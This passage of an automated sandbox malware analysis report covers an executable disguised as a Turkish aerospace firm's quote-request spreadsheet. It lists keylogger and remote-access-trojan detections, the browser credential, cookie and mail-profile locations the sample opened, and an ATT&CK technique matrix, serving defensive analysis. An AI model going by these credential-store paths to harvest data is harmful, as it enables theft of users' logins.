Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Users\user\AppData\Roaming\WheTgQY.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Users\user\AppData\Roaming\WheTgQY.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match

File source: 00000010.00000002.4483172378.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WheTgQY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WheTgQY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4483172378.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4491137274.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match

File source: 00000010.00000002.4483172378.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.WheTgQY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WheTgQY.exe PID: 7400, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	1 Input Capture	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe